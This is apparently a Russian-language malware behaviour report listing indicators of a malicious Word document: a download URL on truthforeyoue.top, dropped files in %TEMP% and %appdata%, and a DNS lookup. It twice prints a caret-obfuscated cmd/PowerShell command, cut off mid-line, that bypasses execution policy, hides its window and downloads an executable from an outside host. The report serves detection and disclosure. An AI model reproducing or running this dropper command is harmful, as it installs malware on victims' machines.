Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWerSh^E^l^L.^E^Xe^ -eXe^Cut^IONpol^i^Cy^ bYp^a^s^S ^-^n^opR^of^iLe ^-^WINDo^wstYLE H^I^d^D^E^n (ne^W-oB^Ject SY^st^EM.nE^T.W^Ebc^l^ienT^)^.D^oWNLOa^D^fiL^E^('http://truthf...
- %TEMP%\word\<Имя файла>.doc
- %TEMP%\word\<Имя файла>.doc
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /c "PoWerSh^E^l^L.^E^Xe^ -eXe^Cut^IONpol^i^Cy^ bYp^a^s^S ^-^n^opR^of^iLe ^-^WINDo^wstYLE H^I^d^D^E^n (ne^W-oB^Ject SY^st^EM.nE^T.W^Ebc^l^ienT^)^.D^oWNLOa^D^fiL^E^('http://truthf...' (со скрытым окном)